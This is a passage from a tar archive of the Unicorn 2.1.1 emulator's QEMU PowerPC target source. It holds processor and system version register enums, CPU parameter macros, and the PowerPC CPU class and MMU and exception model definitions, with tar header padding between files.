CPU_POWERPC_MPC5200_v11 CPU_POWERPC_G2LEgp1 #define CPU_POWERPC_MPC5200_v12 CPU_POWERPC_G2LEgp1 #define CPU_POWERPC_MPC5200B_v20 CPU_POWERPC_G2LEgp1 #define CPU_POWERPC_MPC5200B_v21 CPU_POWERPC_G2LEgp1 /* e200 family */ /* e200 cores */ CPU_POWERPC_e200z5 = 0x81000000, CPU_POWERPC_e200z6 = 0x81120000, /* e300 family */ /* e300 cores */ CPU_POWERPC_e300c1 = 0x00830010, CPU_POWERPC_e300c2 = 0x00840010, CPU_POWERPC_e300c3 = 0x00850010, CPU_POWERPC_e300c4 = 0x00860010, /* MPC83xx microcontrollers */ #define CPU_POWERPC_MPC834x CPU_POWERPC_e300c1 #define CPU_POWERPC_MPC837x CPU_POWERPC_e300c4 /* e500 family */ /* e500 cores */ #define CPU_POWERPC_e500 CPU_POWERPC_e500v2_v22 CPU_POWERPC_e500v1_v10 = 0x80200010, CPU_POWERPC_e500v1_v20 = 0x80200020, CPU_POWERPC_e500v2_v10 = 0x80210010, CPU_POWERPC_e500v2_v11 = 0x80210011, CPU_POWERPC_e500v2_v20 = 0x80210020, CPU_POWERPC_e500v2_v21 = 0x80210021, CPU_POWERPC_e500v2_v22 = 0x80210022, CPU_POWERPC_e500v2_v30 = 0x80210030, CPU_POWERPC_e500mc = 0x80230020, CPU_POWERPC_e5500 = 0x80240020, CPU_POWERPC_e6500 = 0x80400020, /* MPC85xx microcontrollers */ #define CPU_POWERPC_MPC8533_v10 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8533_v11 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8533E_v10 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8533E_v11 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8540_v10 CPU_POWERPC_e500v1_v10 #define CPU_POWERPC_MPC8540_v20 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8540_v21 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8541_v10 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8541_v11 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8541E_v10 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8541E_v11 CPU_POWERPC_e500v1_v20 #define CPU_POWERPC_MPC8543_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8543_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8543_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8543_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8543E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8543E_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8543E_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8543E_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8544_v10 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8544_v11 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8544E_v11 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8544E_v10 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8545_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8545_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8545_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8545E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8545E_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8545E_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8547E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8547E_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8547E_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8548_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8548_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8548_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8548_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8548E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8548E_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8548E_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8548E_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8555_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8555_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8555E_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8555E_v11 CPU_POWERPC_e500v2_v11 #define CPU_POWERPC_MPC8560_v10 CPU_POWERPC_e500v2_v10 #define CPU_POWERPC_MPC8560_v20 CPU_POWERPC_e500v2_v20 #define CPU_POWERPC_MPC8560_v21 CPU_POWERPC_e500v2_v21 #define CPU_POWERPC_MPC8567 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8567E CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8568 CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8568E CPU_POWERPC_e500v2_v22 #define CPU_POWERPC_MPC8572 CPU_POWERPC_e500v2_v30 #define CPU_POWERPC_MPC8572E CPU_POWERPC_e500v2_v30 /* e600 family */ /* e600 cores */ CPU_POWERPC_e600 = 0x80040010, /* MPC86xx microcontrollers */ #define CPU_POWERPC_MPC8610 CPU_POWERPC_e600 #define CPU_POWERPC_MPC8641 CPU_POWERPC_e600 #define CPU_POWERPC_MPC8641D CPU_POWERPC_e600 /* PowerPC 6xx cores */ CPU_POWERPC_601_v0 = 0x00010001, CPU_POWERPC_601_v1 = 0x00010001, CPU_POWERPC_601_v2 = 0x00010002, CPU_POWERPC_602 = 0x00050100, CPU_POWERPC_603 = 0x00030100, CPU_POWERPC_603E_v11 = 0x00060101, CPU_POWERPC_603E_v12 = 0x00060102, CPU_POWERPC_603E_v13 = 0x00060103, CPU_POWERPC_603E_v14 = 0x00060104, CPU_POWERPC_603E_v22 = 0x00060202, CPU_POWERPC_603E_v3 = 0x00060300, CPU_POWERPC_603E_v4 = 0x00060400, CPU_POWERPC_603E_v41 = 0x00060401, CPU_POWERPC_603E7t = 0x00071201, CPU_POWERPC_603E7v = 0x00070100, CPU_POWERPC_603E7v1 = 0x00070101, CPU_POWERPC_603E7v2 = 0x00070201, CPU_POWERPC_603E7 = 0x00070200, CPU_POWERPC_603P = 0x00070000, /* XXX: missing 0x00040303 (604) */ CPU_POWERPC_604 = 0x00040103, /* XXX: missing 0x00091203 */ /* XXX: missing 0x00092110 */ /* XXX: missing 0x00092120 */ CPU_POWERPC_604E_v10 = 0x00090100, CPU_POWERPC_604E_v22 = 0x00090202, CPU_POWERPC_604E_v24 = 0x00090204, /* XXX: missing 0x000a0100 */ /* XXX: missing 0x00093102 */ CPU_POWERPC_604R = 0x000a0101, /* PowerPC 740/750 cores (aka G3) */ /* XXX: missing 0x00084202 */ CPU_POWERPC_7x0_v10 = 0x00080100, CPU_POWERPC_7x0_v20 = 0x00080200, CPU_POWERPC_7x0_v21 = 0x00080201, CPU_POWERPC_7x0_v22 = 0x00080202, CPU_POWERPC_7x0_v30 = 0x00080300, CPU_POWERPC_7x0_v31 = 0x00080301, CPU_POWERPC_740E = 0x00080100, CPU_POWERPC_750E = 0x00080200, CPU_POWERPC_7x0P = 0x10080000, /* XXX: missing 0x00087010 (CL ?) */ CPU_POWERPC_750CL_v10 = 0x00087200, CPU_POWERPC_750CL_v20 = 0x00087210, /* aka rev E */ CPU_POWERPC_750CX_v10 = 0x00082100, CPU_POWERPC_750CX_v20 = 0x00082200, CPU_POWERPC_750CX_v21 = 0x00082201, CPU_POWERPC_750CX_v22 = 0x00082202, CPU_POWERPC_750CXE_v21 = 0x00082211, CPU_POWERPC_750CXE_v22 = 0x00082212, CPU_POWERPC_750CXE_v23 = 0x00082213, CPU_POWERPC_750CXE_v24 = 0x00082214, CPU_POWERPC_750CXE_v24b = 0x00083214, CPU_POWERPC_750CXE_v30 = 0x00082310, CPU_POWERPC_750CXE_v31 = 0x00082311, CPU_POWERPC_750CXE_v31b = 0x00083311, CPU_POWERPC_750CXR = 0x00083410, CPU_POWERPC_750FL = 0x70000203, CPU_POWERPC_750FX_v10 = 0x70000100, CPU_POWERPC_750FX_v20 = 0x70000200, CPU_POWERPC_750FX_v21 = 0x70000201, CPU_POWERPC_750FX_v22 = 0x70000202, CPU_POWERPC_750FX_v23 = 0x70000203, CPU_POWERPC_750GL = 0x70020102, CPU_POWERPC_750GX_v10 = 0x70020100, CPU_POWERPC_750GX_v11 = 0x70020101, CPU_POWERPC_750GX_v12 = 0x70020102, CPU_POWERPC_750L_v20 = 0x00088200, CPU_POWERPC_750L_v21 = 0x00088201, CPU_POWERPC_750L_v22 = 0x00088202, CPU_POWERPC_750L_v30 = 0x00088300, CPU_POWERPC_750L_v32 = 0x00088302, /* PowerPC 745/755 cores */ CPU_POWERPC_7x5_v10 = 0x00083100, CPU_POWERPC_7x5_v11 = 0x00083101, CPU_POWERPC_7x5_v20 = 0x00083200, CPU_POWERPC_7x5_v21 = 0x00083201, CPU_POWERPC_7x5_v22 = 0x00083202, /* aka D */ CPU_POWERPC_7x5_v23 = 0x00083203, /* aka E */ CPU_POWERPC_7x5_v24 = 0x00083204, CPU_POWERPC_7x5_v25 = 0x00083205, CPU_POWERPC_7x5_v26 = 0x00083206, CPU_POWERPC_7x5_v27 = 0x00083207, CPU_POWERPC_7x5_v28 = 0x00083208, /* PowerPC 74xx cores (aka G4) */ /* XXX: missing 0x000C1101 */ CPU_POWERPC_7400_v10 = 0x000C0100, CPU_POWERPC_7400_v11 = 0x000C0101, CPU_POWERPC_7400_v20 = 0x000C0200, CPU_POWERPC_7400_v21 = 0x000C0201, CPU_POWERPC_7400_v22 = 0x000C0202, CPU_POWERPC_7400_v26 = 0x000C0206, CPU_POWERPC_7400_v27 = 0x000C0207, CPU_POWERPC_7400_v28 = 0x000C0208, CPU_POWERPC_7400_v29 = 0x000C0209, CPU_POWERPC_7410_v10 = 0x800C1100, CPU_POWERPC_7410_v11 = 0x800C1101, CPU_POWERPC_7410_v12 = 0x800C1102, /* aka C */ CPU_POWERPC_7410_v13 = 0x800C1103, /* aka D */ CPU_POWERPC_7410_v14 = 0x800C1104, /* aka E */ CPU_POWERPC_7448_v10 = 0x80040100, CPU_POWERPC_7448_v11 = 0x80040101, CPU_POWERPC_7448_v20 = 0x80040200, CPU_POWERPC_7448_v21 = 0x80040201, CPU_POWERPC_7450_v10 = 0x80000100, CPU_POWERPC_7450_v11 = 0x80000101, CPU_POWERPC_7450_v12 = 0x80000102, CPU_POWERPC_7450_v20 = 0x80000200, /* aka A, B, C, D: 2.04 */ CPU_POWERPC_7450_v21 = 0x80000201, /* aka E */ CPU_POWERPC_74x1_v23 = 0x80000203, /* aka G: 2.3 */ /* XXX: this entry might be a bug in some documentation */ CPU_POWERPC_74x1_v210 = 0x80000210, /* aka G: 2.3 ? */ CPU_POWERPC_74x5_v10 = 0x80010100, /* XXX: missing 0x80010200 */ CPU_POWERPC_74x5_v21 = 0x80010201, /* aka C: 2.1 */ CPU_POWERPC_74x5_v32 = 0x80010302, CPU_POWERPC_74x5_v33 = 0x80010303, /* aka F: 3.3 */ CPU_POWERPC_74x5_v34 = 0x80010304, /* aka G: 3.4 */ CPU_POWERPC_74x7_v10 = 0x80020100, /* aka A: 1.0 */ CPU_POWERPC_74x7_v11 = 0x80020101, /* aka B: 1.1 */ CPU_POWERPC_74x7_v12 = 0x80020102, /* aka C: 1.2 */ CPU_POWERPC_74x7A_v10 = 0x80030100, /* aka A: 1.0 */ CPU_POWERPC_74x7A_v11 = 0x80030101, /* aka B: 1.1 */ CPU_POWERPC_74x7A_v12 = 0x80030102, /* aka C: 1.2 */ /* 64 bits PowerPC */ #if defined(TARGET_PPC64) CPU_POWERPC_620 = 0x00140000, CPU_POWERPC_630 = 0x00400000, CPU_POWERPC_631 = 0x00410104, CPU_POWERPC_POWER4 = 0x00350000, CPU_POWERPC_POWER4P = 0x00380000, /* XXX: missing 0x003A0201 */ CPU_POWERPC_POWER5 = 0x003A0203, CPU_POWERPC_POWER5P_v21 = 0x003B0201, CPU_POWERPC_POWER6 = 0x003E0000, CPU_POWERPC_POWER_SERVER_MASK = 0xFFFF0000, CPU_POWERPC_POWER7_BASE = 0x003F0000, CPU_POWERPC_POWER7_v23 = 0x003F0203, CPU_POWERPC_POWER7P_BASE = 0x004A0000, CPU_POWERPC_POWER7P_v21 = 0x004A0201, CPU_POWERPC_POWER8E_BASE = 0x004B0000, CPU_POWERPC_POWER8E_v21 = 0x004B0201, CPU_POWERPC_POWER8_BASE = 0x004D0000, CPU_POWERPC_POWER8_v20 = 0x004D0200, CPU_POWERPC_POWER8NVL_BASE = 0x004C0000, CPU_POWERPC_POWER8NVL_v10 = 0x004C0100, CPU_POWERPC_POWER9_BASE = 0x004E0000, CPU_POWERPC_POWER9_DD1 = 0x004E0100, CPU_POWERPC_POWER9_DD20 = 0x004E1200, CPU_POWERPC_POWER10_BASE = 0x00800000, CPU_POWERPC_POWER10_DD1 = 0x00800100, CPU_POWERPC_970_v22 = 0x00390202, CPU_POWERPC_970FX_v10 = 0x00391100, CPU_POWERPC_970FX_v20 = 0x003C0200, CPU_POWERPC_970FX_v21 = 0x003C0201, CPU_POWERPC_970FX_v30 = 0x003C0300, CPU_POWERPC_970FX_v31 = 0x003C0301, CPU_POWERPC_970MP_v10 = 0x00440100, CPU_POWERPC_970MP_v11 = 0x00440101, #define CPU_POWERPC_CELL CPU_POWERPC_CELL_v32 CPU_POWERPC_CELL_v10 = 0x00700100, CPU_POWERPC_CELL_v20 = 0x00700400, CPU_POWERPC_CELL_v30 = 0x00700500, CPU_POWERPC_CELL_v31 = 0x00700501, #define CPU_POWERPC_CELL_v32 CPU_POWERPC_CELL_v31 CPU_POWERPC_RS64 = 0x00330000, CPU_POWERPC_RS64II = 0x00340000, CPU_POWERPC_RS64III = 0x00360000, CPU_POWERPC_RS64IV = 0x00370000, #endif /* defined(TARGET_PPC64) */ /* Original POWER */ /* * XXX: should be POWER (RIOS), RSC3308, RSC4608, * POWER2 (RIOS2) & RSC2 (P2SC) here */ /* PA Semi core */ CPU_POWERPC_PA6T = 0x00900000, }; /* Logical PVR definitions for sPAPR */ enum { CPU_POWERPC_LOGICAL_2_04 = 0x0F000001, CPU_POWERPC_LOGICAL_2_05 = 0x0F000002, CPU_POWERPC_LOGICAL_2_06 = 0x0F000003, CPU_POWERPC_LOGICAL_2_06_PLUS = 0x0F100003, CPU_POWERPC_LOGICAL_2_07 = 0x0F000004, CPU_POWERPC_LOGICAL_3_00 = 0x0F000005, CPU_POWERPC_LOGICAL_3_10 = 0x0F000006, }; /* System version register (used on MPC 8xxx) */ enum { POWERPC_SVR_NONE = 0x00000000, POWERPC_SVR_5200_v10 = 0x80110010, POWERPC_SVR_5200_v11 = 0x80110011, POWERPC_SVR_5200_v12 = 0x80110012, POWERPC_SVR_5200B_v20 = 0x80110020, POWERPC_SVR_5200B_v21 = 0x80110021, #define POWERPC_SVR_55xx POWERPC_SVR_5567 POWERPC_SVR_8343 = 0x80570010, POWERPC_SVR_8343A = 0x80570030, POWERPC_SVR_8343E = 0x80560010, POWERPC_SVR_8343EA = 0x80560030, POWERPC_SVR_8347P = 0x80550010, /* PBGA package */ POWERPC_SVR_8347T = 0x80530010, /* TBGA package */ POWERPC_SVR_8347AP = 0x80550030, /* PBGA package */ POWERPC_SVR_8347AT = 0x80530030, /* TBGA package */ POWERPC_SVR_8347EP = 0x80540010, /* PBGA package */ POWERPC_SVR_8347ET = 0x80520010, /* TBGA package */ POWERPC_SVR_8347EAP = 0x80540030, /* PBGA package */ POWERPC_SVR_8347EAT = 0x80520030, /* TBGA package */ POWERPC_SVR_8349 = 0x80510010, POWERPC_SVR_8349A = 0x80510030, POWERPC_SVR_8349E = 0x80500010, POWERPC_SVR_8349EA = 0x80500030, #define POWERPC_SVR_E500 0x40000000 POWERPC_SVR_8377 = 0x80C70010 | POWERPC_SVR_E500, POWERPC_SVR_8377E = 0x80C60010 | POWERPC_SVR_E500, POWERPC_SVR_8378 = 0x80C50010 | POWERPC_SVR_E500, POWERPC_SVR_8378E = 0x80C40010 | POWERPC_SVR_E500, POWERPC_SVR_8379 = 0x80C30010 | POWERPC_SVR_E500, POWERPC_SVR_8379E = 0x80C00010 | POWERPC_SVR_E500, POWERPC_SVR_8533_v10 = 0x80340010 | POWERPC_SVR_E500, POWERPC_SVR_8533_v11 = 0x80340011 | POWERPC_SVR_E500, POWERPC_SVR_8533E_v10 = 0x803C0010 | POWERPC_SVR_E500, POWERPC_SVR_8533E_v11 = 0x803C0011 | POWERPC_SVR_E500, POWERPC_SVR_8540_v10 = 0x80300010 | POWERPC_SVR_E500, POWERPC_SVR_8540_v20 = 0x80300020 | POWERPC_SVR_E500, POWERPC_SVR_8540_v21 = 0x80300021 | POWERPC_SVR_E500, POWERPC_SVR_8541_v10 = 0x80720010 | POWERPC_SVR_E500, POWERPC_SVR_8541_v11 = 0x80720011 | POWERPC_SVR_E500, POWERPC_SVR_8541E_v10 = 0x807A0010 | POWERPC_SVR_E500, POWERPC_SVR_8541E_v11 = 0x807A0011 | POWERPC_SVR_E500, POWERPC_SVR_8543_v10 = 0x80320010 | POWERPC_SVR_E500, POWERPC_SVR_8543_v11 = 0x80320011 | POWERPC_SVR_E500, POWERPC_SVR_8543_v20 = 0x80320020 | POWERPC_SVR_E500, POWERPC_SVR_8543_v21 = 0x80320021 | POWERPC_SVR_E500, POWERPC_SVR_8543E_v10 = 0x803A0010 | POWERPC_SVR_E500, POWERPC_SVR_8543E_v11 = 0x803A0011 | POWERPC_SVR_E500, POWERPC_SVR_8543E_v20 = 0x803A0020 | POWERPC_SVR_E500, POWERPC_SVR_8543E_v21 = 0x803A0021 | POWERPC_SVR_E500, POWERPC_SVR_8544_v10 = 0x80340110 | POWERPC_SVR_E500, POWERPC_SVR_8544_v11 = 0x80340111 | POWERPC_SVR_E500, POWERPC_SVR_8544E_v10 = 0x803C0110 | POWERPC_SVR_E500, POWERPC_SVR_8544E_v11 = 0x803C0111 | POWERPC_SVR_E500, POWERPC_SVR_8545_v20 = 0x80310220 | POWERPC_SVR_E500, POWERPC_SVR_8545_v21 = 0x80310221 | POWERPC_SVR_E500, POWERPC_SVR_8545E_v20 = 0x80390220 | POWERPC_SVR_E500, POWERPC_SVR_8545E_v21 = 0x80390221 | POWERPC_SVR_E500, POWERPC_SVR_8547E_v20 = 0x80390120 | POWERPC_SVR_E500, POWERPC_SVR_8547E_v21 = 0x80390121 | POWERPC_SVR_E500, POWERPC_SVR_8548_v10 = 0x80310010 | POWERPC_SVR_E500, POWERPC_SVR_8548_v11 = 0x80310011 | POWERPC_SVR_E500, POWERPC_SVR_8548_v20 = 0x80310020 | POWERPC_SVR_E500, POWERPC_SVR_8548_v21 = 0x80310021 | POWERPC_SVR_E500, POWERPC_SVR_8548E_v10 = 0x80390010 | POWERPC_SVR_E500, POWERPC_SVR_8548E_v11 = 0x80390011 | POWERPC_SVR_E500, POWERPC_SVR_8548E_v20 = 0x80390020 | POWERPC_SVR_E500, POWERPC_SVR_8548E_v21 = 0x80390021 | POWERPC_SVR_E500, POWERPC_SVR_8555_v10 = 0x80710010 | POWERPC_SVR_E500, POWERPC_SVR_8555_v11 = 0x80710011 | POWERPC_SVR_E500, POWERPC_SVR_8555E_v10 = 0x80790010 | POWERPC_SVR_E500, POWERPC_SVR_8555E_v11 = 0x80790011 | POWERPC_SVR_E500, POWERPC_SVR_8560_v10 = 0x80700010 | POWERPC_SVR_E500, POWERPC_SVR_8560_v20 = 0x80700020 | POWERPC_SVR_E500, POWERPC_SVR_8560_v21 = 0x80700021 | POWERPC_SVR_E500, POWERPC_SVR_8567 = 0x80750111 | POWERPC_SVR_E500, POWERPC_SVR_8567E = 0x807D0111 | POWERPC_SVR_E500, POWERPC_SVR_8568 = 0x80750011 | POWERPC_SVR_E500, POWERPC_SVR_8568E = 0x807D0011 | POWERPC_SVR_E500, POWERPC_SVR_8572 = 0x80E00010 | POWERPC_SVR_E500, POWERPC_SVR_8572E = 0x80E80010 | POWERPC_SVR_E500, POWERPC_SVR_8610 = 0x80A00011, POWERPC_SVR_8641 = 0x80900021, POWERPC_SVR_8641D = 0x80900121, }; #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/cpu-param.h�����������������������������������������������������������0000664�0000000�0000000�00000001675�14675241067�0020272�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC cpu parameters for qemu. * * Copyright (c) 2007 Jocelyn Mayer * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef PPC_CPU_PARAM_H #define PPC_CPU_PARAM_H 1 #ifdef TARGET_PPC64 # define TARGET_LONG_BITS 64 /* * Note that the official physical address space bits is 62-M where M * is implementation dependent. I've not looked up M for the set of * cpus we emulate at the system level. */ #define TARGET_PHYS_ADDR_SPACE_BITS 62 /* * Note that the PPC environment architecture talks about 80 bit virtual * addresses, with segmentation. Obviously that's not all visible to a * single process, which is all we're concerned with here. */ # ifdef TARGET_ABI32 # define TARGET_VIRT_ADDR_SPACE_BITS 32 # else # define TARGET_VIRT_ADDR_SPACE_BITS 64 # endif #else # define TARGET_LONG_BITS 32 # define TARGET_PHYS_ADDR_SPACE_BITS 36 # define TARGET_VIRT_ADDR_SPACE_BITS 32 #endif #define TARGET_PAGE_BITS 12 #define NB_MMU_MODES 10 #endif �������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/cpu-qom.h�������������������������������������������������������������0000664�0000000�0000000�00000017213�14675241067�0017761�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU PowerPC CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_PPC_CPU_QOM_H #define QEMU_PPC_CPU_QOM_H #include "hw/core/cpu.h" #ifdef TARGET_PPC64 #define TYPE_POWERPC_CPU "powerpc64-cpu" #else #define TYPE_POWERPC_CPU "powerpc-cpu" #endif #define POWERPC_CPU(obj) ((PowerPCCPU *)obj) #define POWERPC_CPU_CLASS(klass) ((PowerPCCPUClass *)klass) #define POWERPC_CPU_GET_CLASS(obj) (&((PowerPCCPU *)obj)->cc) typedef struct PowerPCCPU PowerPCCPU; typedef struct CPUPPCState CPUPPCState; typedef struct ppc_tb_t ppc_tb_t; typedef struct ppc_dcr_t ppc_dcr_t; /*****************************************************************************/ /* MMU model */ typedef enum powerpc_mmu_t powerpc_mmu_t; enum powerpc_mmu_t { POWERPC_MMU_UNKNOWN = 0x00000000, /* Standard 32 bits PowerPC MMU */ POWERPC_MMU_32B = 0x00000001, /* PowerPC 6xx MMU with software TLB */ POWERPC_MMU_SOFT_6xx = 0x00000002, /* PowerPC 74xx MMU with software TLB */ POWERPC_MMU_SOFT_74xx = 0x00000003, /* PowerPC 4xx MMU with software TLB */ POWERPC_MMU_SOFT_4xx = 0x00000004, /* PowerPC 4xx MMU with software TLB and zones protections */ POWERPC_MMU_SOFT_4xx_Z = 0x00000005, /* PowerPC MMU in real mode only */ POWERPC_MMU_REAL = 0x00000006, /* Freescale MPC8xx MMU model */ POWERPC_MMU_MPC8xx = 0x00000007, /* BookE MMU model */ POWERPC_MMU_BOOKE = 0x00000008, /* BookE 2.06 MMU model */ POWERPC_MMU_BOOKE206 = 0x00000009, /* PowerPC 601 MMU model (specific BATs format) */ POWERPC_MMU_601 = 0x0000000A, #define POWERPC_MMU_64 0x00010000 /* 64 bits PowerPC MMU */ POWERPC_MMU_64B = POWERPC_MMU_64 | 0x00000001, /* Architecture 2.03 and later (has LPCR) */ POWERPC_MMU_2_03 = POWERPC_MMU_64 | 0x00000002, /* Architecture 2.06 variant */ POWERPC_MMU_2_06 = POWERPC_MMU_64 | 0x00000003, /* Architecture 2.07 variant */ POWERPC_MMU_2_07 = POWERPC_MMU_64 | 0x00000004, /* Architecture 3.00 variant */ POWERPC_MMU_3_00 = POWERPC_MMU_64 | 0x00000005, }; /*****************************************************************************/ /* Exception model */ typedef enum powerpc_excp_t powerpc_excp_t; enum powerpc_excp_t { POWERPC_EXCP_UNKNOWN = 0, /* Standard PowerPC exception model */ POWERPC_EXCP_STD, /* PowerPC 40x exception model */ POWERPC_EXCP_40x, /* PowerPC 601 exception model */ POWERPC_EXCP_601, /* PowerPC 602 exception model */ POWERPC_EXCP_602, /* PowerPC 603 exception model */ POWERPC_EXCP_603, /* PowerPC 603e exception model */ POWERPC_EXCP_603E, /* PowerPC G2 exception model */ POWERPC_EXCP_G2, /* PowerPC 604 exception model */ POWERPC_EXCP_604, /* PowerPC 7x0 exception model */ POWERPC_EXCP_7x0, /* PowerPC 7x5 exception model */ POWERPC_EXCP_7x5, /* PowerPC 74xx exception model */ POWERPC_EXCP_74xx, /* BookE exception model */ POWERPC_EXCP_BOOKE, /* PowerPC 970 exception model */ POWERPC_EXCP_970, /* POWER7 exception model */ POWERPC_EXCP_POWER7, /* POWER8 exception model */ POWERPC_EXCP_POWER8, /* POWER9 exception model */ POWERPC_EXCP_POWER9, }; /*****************************************************************************/ /* PM instructions */ typedef enum { PPC_PM_DOZE, PPC_PM_NAP, PPC_PM_SLEEP, PPC_PM_RVWINKLE, PPC_PM_STOP, } powerpc_pm_insn_t; /*****************************************************************************/ /* Input pins model */ typedef enum powerpc_input_t powerpc_input_t; enum powerpc_input_t { PPC_FLAGS_INPUT_UNKNOWN = 0, /* PowerPC 6xx bus */ PPC_FLAGS_INPUT_6xx, /* BookE bus */ PPC_FLAGS_INPUT_BookE, /* PowerPC 405 bus */ PPC_FLAGS_INPUT_405, /* PowerPC 970 bus */ PPC_FLAGS_INPUT_970, /* PowerPC POWER7 bus */ PPC_FLAGS_INPUT_POWER7, /* PowerPC POWER9 bus */ PPC_FLAGS_INPUT_POWER9, /* PowerPC 401 bus */ PPC_FLAGS_INPUT_401, /* Freescale RCPU bus */ PPC_FLAGS_INPUT_RCPU, }; typedef struct PPCHash64Options PPCHash64Options; /** * PowerPCCPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * A PowerPC CPU model. */ typedef struct PowerPCCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); uint32_t pvr; bool (*pvr_match)(struct PowerPCCPUClass *pcc, uint32_t pvr); uint64_t pcr_mask; /* Available bits in PCR register */ uint64_t pcr_supported; /* Bits for supported PowerISA versions */ uint32_t svr; uint64_t insns_flags; uint64_t insns_flags2; uint64_t msr_mask; uint64_t lpcr_mask; /* Available bits in the LPCR */ uint64_t lpcr_pm; /* Power-saving mode Exit Cause Enable bits */ powerpc_mmu_t mmu_model; powerpc_excp_t excp_model; powerpc_input_t bus_model; uint32_t flags; int bfd_mach; uint32_t l1_dcache_size, l1_icache_size; const PPCHash64Options *hash64_opts; struct ppc_radix_page_info *radix_page_info; uint32_t lrg_decr_bits; int n_host_threads; void (*init_proc)(CPUPPCState *env); int (*check_pow)(CPUPPCState *env); int (*handle_mmu_fault)(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx); bool (*interrupts_big_endian)(PowerPCCPU *cpu); } PowerPCCPUClass; typedef struct PPCTimebase { uint64_t guest_timebase; int64_t time_of_the_day_ns; bool runstate_paused; } PPCTimebase; #if 0 extern const VMStateDescription vmstate_ppc_timebase; #define VMSTATE_PPC_TIMEBASE_V(_field, _state, _version) { \ .name = (stringify(_field)), \ .version_id = (_version), \ .size = sizeof(PPCTimebase), \ .vmsd = &vmstate_ppc_timebase, \ .flags = VMS_STRUCT, \ .offset = vmstate_offset_value(_state, _field, PPCTimebase), \ } void cpu_ppc_clock_vm_state_change(void *opaque, int running, RunState state); #endif #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/cpu.c�����������������������������������������������������������������0000664�0000000�0000000�00000003166�14675241067�0017164�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC CPU routines for qemu. * * Copyright (c) 2017 Nikunj A Dadhania, IBM Corporation. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. 